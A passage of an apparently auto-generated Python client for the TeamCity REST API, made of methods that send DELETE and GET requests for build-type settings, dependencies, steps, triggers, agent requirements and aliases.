collection_formats=collection_formats)
def __delete_all_parameters_0_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""delete_all_parameters_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_all_parameters_0_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_all_parameters_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_all_parameters_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_artifact_dep_with_http_info(self, bt_locator, artifact_dep_locator, **kwargs): # noqa: E501
"""delete_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_artifact_dep_with_http_info(bt_locator, artifact_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str artifact_dep_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'artifact_dep_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_artifact_dep" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_artifact_dep`") # noqa: E501
# verify the required parameter 'artifact_dep_locator' is set
if ('artifact_dep_locator' not in params or
params['artifact_dep_locator'] is None):
raise ValueError("Missing the required parameter `artifact_dep_locator` when calling `delete_artifact_dep`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'artifact_dep_locator' in params:
if isinstance(params['artifact_dep_locator'], TeamCityObject):
path_params['artifactDepLocator'] = params['artifact_dep_locator'].locator_id
else:
path_params['artifactDepLocator'] = params['artifact_dep_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/artifact-dependencies/{artifactDepLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_build_type_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""delete_build_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_build_type_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_build_type" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_build_type`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_feature_with_http_info(self, bt_locator, feature_id, **kwargs): # noqa: E501
"""delete_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_feature_with_http_info(bt_locator, feature_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str feature_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'feature_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_feature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_feature`") # noqa: E501
# verify the required parameter 'feature_id' is set
if ('feature_id' not in params or
params['feature_id'] is None):
raise ValueError("Missing the required parameter `feature_id` when calling `delete_feature`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'feature_id' in params:
if isinstance(params['feature_id'], TeamCityObject):
path_params['featureId'] = params['feature_id'].locator_id
else:
path_params['featureId'] = params['feature_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features/{featureId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_parameter_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""delete_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_parameter_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_parameter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_parameter`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_parameter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_parameter_0_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""delete_parameter_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_parameter_0_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_parameter_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_parameter_0`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_parameter_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_snapshot_dep_with_http_info(self, bt_locator, snapshot_dep_locator, **kwargs): # noqa: E501
"""delete_snapshot_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str snapshot_dep_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'snapshot_dep_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_dep" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_snapshot_dep`") # noqa: E501
# verify the required parameter 'snapshot_dep_locator' is set
if ('snapshot_dep_locator' not in params or
params['snapshot_dep_locator'] is None):
raise ValueError("Missing the required parameter `snapshot_dep_locator` when calling `delete_snapshot_dep`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'snapshot_dep_locator' in params:
if isinstance(params['snapshot_dep_locator'], TeamCityObject):
path_params['snapshotDepLocator'] = params['snapshot_dep_locator'].locator_id
else:
path_params['snapshotDepLocator'] = params['snapshot_dep_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/snapshot-dependencies/{snapshotDepLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_step_with_http_info(self, bt_locator, step_id, **kwargs): # noqa: E501
"""delete_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_step_with_http_info(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_step" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_step`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `delete_step`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_trigger_with_http_info(self, bt_locator, trigger_locator, **kwargs): # noqa: E501
"""delete_trigger # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_trigger_with_http_info(bt_locator, trigger_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'trigger_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_trigger" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_trigger`") # noqa: E501
# verify the required parameter 'trigger_locator' is set
if ('trigger_locator' not in params or
params['trigger_locator'] is None):
raise ValueError("Missing the required parameter `trigger_locator` when calling `delete_trigger`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'trigger_locator' in params:
if isinstance(params['trigger_locator'], TeamCityObject):
path_params['triggerLocator'] = params['trigger_locator'].locator_id
else:
path_params['triggerLocator'] = params['trigger_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/triggers/{triggerLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_vcs_root_entry_with_http_info(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""delete_vcs_root_entry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'vcs_root_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_vcs_root_entry" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_vcs_root_entry`") # noqa: E501
# verify the required parameter 'vcs_root_locator' is set
if ('vcs_root_locator' not in params or
params['vcs_root_locator'] is None):
raise ValueError("Missing the required parameter `vcs_root_locator` when calling `delete_vcs_root_entry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'vcs_root_locator' in params:
if isinstance(params['vcs_root_locator'], TeamCityObject):
path_params['vcsRootLocator'] = params['vcs_root_locator'].locator_id
else:
path_params['vcsRootLocator'] = params['vcs_root_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs-root-entries/{vcsRootLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_agent_requirement_with_http_info(self, bt_locator, agent_requirement_locator, **kwargs):  # noqa: E501
    """get_agent_requirement  # noqa: E501

    Fetch a single agent requirement of a build type.
    Synchronous by default; pass async_req=True for an asynchronous call.

    :param async_req bool
    :param str bt_locator: (required)
    :param str agent_requirement_locator: (required)
    :param str fields:
    :return: AgentRequirement
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = ('bt_locator', 'agent_requirement_locator', 'fields',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout')
    # Reject any keyword argument this endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_agent_requirement" % key
            )
    params = dict(kwargs)
    params['bt_locator'] = bt_locator
    params['agent_requirement_locator'] = agent_requirement_locator

    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_agent_requirement`")  # noqa: E501
    if params['agent_requirement_locator'] is None:
        raise ValueError("Missing the required parameter `agent_requirement_locator` when calling `get_agent_requirement`")  # noqa: E501

    def _locator(value):
        # TeamCityObject wrappers expose their raw locator via locator_id.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'btLocator': _locator(params['bt_locator']),
        'agentRequirementLocator': _locator(params['agent_requirement_locator']),
    }
    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/agent-requirements/{agentRequirementLocator}', 'GET',
        path_params,
        query_params,
        {},                       # header params
        body=None,
        post_params=[],
        files={},
        response_type='AgentRequirement',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __get_agent_requirements_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_agent_requirements  # noqa: E501

    List the agent requirements of a build type.
    Synchronous by default; pass async_req=True for an asynchronous call.

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :return: AgentRequirements
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = ('bt_locator', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword argument this endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_agent_requirements" % key
            )
    params = dict(kwargs)
    params['bt_locator'] = bt_locator

    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_agent_requirements`")  # noqa: E501

    def _locator(value):
        # TeamCityObject wrappers expose their raw locator via locator_id.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {'btLocator': _locator(params['bt_locator'])}
    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/agent-requirements', 'GET',
        path_params,
        query_params,
        {},                       # header params
        body=None,
        post_params=[],
        files={},
        response_type='AgentRequirements',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __get_aliases_with_http_info(self, bt_locator, field, **kwargs):  # noqa: E501
    """get_aliases  # noqa: E501

    Fetch the aliases of a build type.
    Synchronous by default; pass async_req=True for an asynchronous call.

    :param async_req bool
    :param str bt_locator: (required)
    :param str field: (required)
    :return: Items
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = ('bt_locator', 'field', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword argument this endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_aliases" % key
            )
    params = dict(kwargs)
    params['bt_locator'] = bt_locator
    params['field'] = field

    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_aliases`")  # noqa: E501
    if params['field'] is None:
        raise ValueError("Missing the required parameter `field` when calling `get_aliases`")  # noqa: E501

    def _locator(value):
        # TeamCityObject wrappers expose their raw locator via locator_id.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    # NOTE(review): `field` is placed in path_params although the URL
    # template below has no {field} placeholder — kept as generated.
    path_params = {
        'btLocator': _locator(params['bt_locator']),
        'field': _locator(params['field']),
    }
    query_params = []

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/aliases', 'GET',
        path_params,
        query_params,
        {},                       # header params
        body=None,
        post_params=[],
        files={},
        response_type='Items',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __get_artifact_dep_with_http_info(self, bt_locator, artifact_dep_locator, **kwargs):  # noqa: E501
    """get_artifact_dep  # noqa: E501

    Fetch a single artifact dependency of a build type.
    Synchronous by default; pass async_req=True for an asynchronous call.

    :param async_req bool
    :param str bt_locator: (required)
    :param str artifact_dep_locator: (required)
    :param str fields:
    :return: ArtifactDependency
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = ('bt_locator', 'artifact_dep_locator', 'fields',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout')
    # Reject any keyword argument this endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_artifact_dep" % key
            )
    params = dict(kwargs)
    params['bt_locator'] = bt_locator
    params['artifact_dep_locator'] = artifact_dep_locator

    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_artifact_dep`")  # noqa: E501
    if params['artifact_dep_locator'] is None:
        raise ValueError("Missing the required parameter `artifact_dep_locator` when calling `get_artifact_dep`")  # noqa: E501

    def _locator(value):
        # TeamCityObject wrappers expose their raw locator via locator_id.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'btLocator': _locator(params['bt_locator']),
        'artifactDepLocator': _locator(params['artifact_dep_locator']),
    }
    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/artifact-dependencies/{artifactDepLocator}', 'GET',
        path_params,
        query_params,
        {},                       # header params
        body=None,
        post_params=[],
        files={},
        response_type='ArtifactDependency',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __get_artifact_dep_setting_with_http_info(self, bt_locator, artifact_dep_locator, field_name, **kwargs):  # noqa: E501
    """get_artifact_dep_setting  # noqa: E501

    Read one field of an artifact dependency of a build type.
    Synchronous by default; pass async_req=True for an asynchronous call.

    :param async_req bool
    :param str bt_locator: (required)
    :param str artifact_dep_locator: (required)
    :param str field_name: (required)
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = ('bt_locator', 'artifact_dep_locator', 'field_name',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout')
    # Reject any keyword argument this endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_artifact_dep_setting" % key
            )
    params = dict(kwargs)
    params['bt_locator'] = bt_locator
    params['artifact_dep_locator'] = artifact_dep_locator
    params['field_name'] = field_name

    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_artifact_dep_setting`")  # noqa: E501
    if params['artifact_dep_locator'] is None:
        raise ValueError("Missing the required parameter `artifact_dep_locator` when calling `get_artifact_dep_setting`")  # noqa: E501
    if params['field_name'] is None:
        raise ValueError("Missing the required parameter `field_name` when calling `get_artifact_dep_setting`")  # noqa: E501

    def _locator(value):
        # TeamCityObject wrappers expose their raw locator via locator_id.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'btLocator': _locator(params['bt_locator']),
        'artifactDepLocator': _locator(params['artifact_dep_locator']),
        'fieldName': _locator(params['field_name']),
    }
    query_params = []

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/artifact-dependencies/{artifactDepLocator}/{fieldName}', 'GET',
        path_params,
        query_params,
        {},                       # header params
        body=None,
        post_params=[],
        files={},
        response_type='str',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __get_artifact_deps_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_artifact_deps  # noqa: E501

    List the artifact dependencies of a build type.
    Synchronous by default; pass async_req=True for an asynchronous call.

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :return: ArtifactDependencies
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = ('bt_locator', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword argument this endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_artifact_deps" % key
            )
    params = dict(kwargs)
    params['bt_locator'] = bt_locator

    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_artifact_deps`")  # noqa: E501

    def _locator(value):
        # TeamCityObject wrappers expose their raw locator via locator_id.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {'btLocator': _locator(params['bt_locator'])}
    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))

    return self.api_client.call_api(
